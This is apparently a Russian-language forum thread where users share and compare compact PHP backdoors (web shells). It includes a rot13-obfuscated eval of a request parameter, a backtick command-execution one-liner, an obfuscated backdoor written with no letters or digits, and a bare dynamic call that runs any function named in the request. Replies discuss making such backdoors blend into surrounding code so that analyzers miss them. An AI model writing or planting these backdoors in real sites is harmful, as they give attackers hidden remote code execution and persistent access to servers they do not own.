1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно. Вчера придумал PHP: <?php@$_REQUEST['large'](str_rot13('riny($_ERDHRFG["pbqr"]);')); ?> Могу поздравить себя с первым собственным пхп-бекдором. 2) Используем фичу обратных кавычек. Исполняет код передаваемый в параметре = названию переменной. PHP: <?=@`$f`; Но тут уже минусы: нужен register_globals. Зато получился самый маленький бекдор на PHP. 3) PHP-Backdoor, без единой буквы и цифры (не моя работа) PHP: <?php@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];$_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_] );?> 4) PHP-Backdoor, спасибо тебе, типизация которой нет PHP: <?php $_REQUEST['f']($_REQUEST['c']); ?>
бэкдор, скорее, должен быть незаметным и сливаться с остальным кодом, чем быть самым коротким, или быть только из символов скобок. то есть всегда по ситуации
Ужасно. Практически ничего нового. 1 способ интересен, но первый же попашийся анализатор кода спалит ваш assert со всеми потрохами. 2 способ описан Raz0r аж в 2008 году http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/ 3 способ - обычная обфускация. Таких динамических бэкдоров понаделать очень просто. 4 способ - классика. Им пользуются давно и это, наверное, самый распространённый тип бэкдора на сегодняшний день.
Не против если объединю с классикой?) PHP: @$_REQUEST['large'](str_rot13('riny($_ERDHRFG["pbqr"]);'));
